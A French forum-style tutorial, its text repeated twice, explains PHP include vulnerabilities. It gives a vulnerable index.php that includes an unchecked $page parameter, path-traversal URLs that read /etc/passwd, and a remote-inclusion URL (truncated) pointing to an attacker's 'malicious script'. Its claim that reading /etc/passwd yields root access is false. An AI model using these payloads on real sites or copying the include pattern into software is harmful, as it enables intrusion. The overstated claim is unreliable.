La Faille Include :
1.1 Présentation :
Le Langage PHP est le langage le plus répandu sur le net mais aussi le plus puissant car il prend Control de la quasi-totalité du serveur. L’include () est l’une des fonctions PHP les plus utilisées sur La toile, elle permet l’appel de pages depuis une autre. Exemple : Admettons que toutes vos Pages utilisent la page sql.php dans laquelle sont contenus vos informations SQL, il convient de L’inclure dans chacune de vos pages plutôt que de retaper l’équivalent de sql.php dans toutes vos Pages. Voici donc un exemple pour mieux éclaircir :
L’url du site : http://www.site.com/index.php?page=contact.php
La page index.php ici aurait la structure suivante :
Ainsi toutes les pages appelées par index.php de l’url (comme l’exemple ci-dessus ) incluraient Automatiquement le fichier sql.php
1.2 Exploitation :
Il y a deux manières d’exploiter la faille Include :
Exploitation Interne :
Reprenons notre Exemple : http://www.site.com/index.php?page=contact.php
Ici la page index.php recevait comme paramètre la page contact.php pour ensuite l’inclure ,donc Si on remplace contact.php par un fichier sensible existant sur le serveur, index.php l’inclurai ce Qui nous permettrai de le lire .Voici quelques exemples :
Ici le site afficherais le contenu du repertoire /etc/passwd, ou se trouvent les comptesAdministrateurs, ce qui vous permettrais d’avoir : un accès root sur le serveur.
Exploitation Externe :
Reprenons encore une fois notre Exemple : http://www.site.com/index.php?page=contact.php
Ce genre d’exploitation est le plus courant, ici c’est un script PHP hébergé sur notre propre Serveur qu’on pourrait inclure a l’aide d’un appel extérieur de la sorte :
http://www.site.com/index.php?page=h...-malfesant.php
Comme vous l’avez surement compris votre « script-malfaisant » s’occupera du reste, il y a Plusieurs possibilités, des connaissances en PHP s’imposent, ce qui n’est pas l’objet de notre Tutorial.
1.3 Conclusion :
La Faille Include est une faille très répandue sur le net ce qui fait d’elle une faille dangereuse Pour les webmasters qui vise l’index de leur site et aussi leur statut « root » .
1.1 Présentation :
Le Langage PHP est le langage le plus répandu sur le net mais aussi le plus puissant car il prend Control de la quasi-totalité du serveur. L’include () est l’une des fonctions PHP les plus utilisées sur La toile, elle permet l’appel de pages depuis une autre. Exemple : Admettons que toutes vos Pages utilisent la page sql.php dans laquelle sont contenus vos informations SQL, il convient de L’inclure dans chacune de vos pages plutôt que de retaper l’équivalent de sql.php dans toutes vos Pages. Voici donc un exemple pour mieux éclaircir :
L’url du site : http://www.site.com/index.php?page=contact.php
La page index.php ici aurait la structure suivante :
Code:
<? include("sql.php"); include($page); include("footer.php"); ?>
1.2 Exploitation :
Il y a deux manières d’exploiter la faille Include :
Exploitation Interne :
Reprenons notre Exemple : http://www.site.com/index.php?page=contact.php
Ici la page index.php recevait comme paramètre la page contact.php pour ensuite l’inclure ,donc Si on remplace contact.php par un fichier sensible existant sur le serveur, index.php l’inclurai ce Qui nous permettrai de le lire .Voici quelques exemples :
Code:
http://www.site.com/index.php?page=/etc/passwd http://www.site.com/index.php?page=../../../../../../../etc/passwd
Exploitation Externe :
Reprenons encore une fois notre Exemple : http://www.site.com/index.php?page=contact.php
Ce genre d’exploitation est le plus courant, ici c’est un script PHP hébergé sur notre propre Serveur qu’on pourrait inclure a l’aide d’un appel extérieur de la sorte :
http://www.site.com/index.php?page=h...-malfesant.php
Comme vous l’avez surement compris votre « script-malfaisant » s’occupera du reste, il y a Plusieurs possibilités, des connaissances en PHP s’imposent, ce qui n’est pas l’objet de notre Tutorial.
1.3 Conclusion :
La Faille Include est une faille très répandue sur le net ce qui fait d’elle une faille dangereuse Pour les webmasters qui vise l’index de leur site et aussi leur statut « root » .
Commentaire